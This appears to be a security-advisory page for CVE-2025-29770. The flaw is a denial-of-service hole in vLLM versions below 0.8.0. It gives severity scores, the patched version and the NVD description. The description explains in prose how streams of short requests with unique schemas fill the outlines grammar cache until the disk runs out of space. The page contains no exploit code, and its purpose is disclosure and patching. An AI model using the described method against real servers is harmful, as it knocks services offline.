CVE-2025-29770

GHSA-mgrm-fgjv-mhv8 MEDIUM
Published March 19, 2025

vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding)....

Full analysis pending. Showing NVD description excerpt.

Affected Systems

Package Ecosystem Vulnerable Range Patched
vllm pip < 0.8.0 0.8.0
vllm pip No patch

Severity & Risk

CVSS 3.1
6.5 / 10
EPSS
0.3%
chance of exploitation in 30 days
KEV Status
Not in KEV
Sophistication
N/A

Recommended Action

Patch available

Update vllm to version 0.8.0

Compliance Impact

Compliance analysis pending. Sign in for full compliance mapping when available.

Technical Details

NVD Description

vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Timeline

Published
March 19, 2025
Last Modified
July 31, 2025
First Seen
March 19, 2025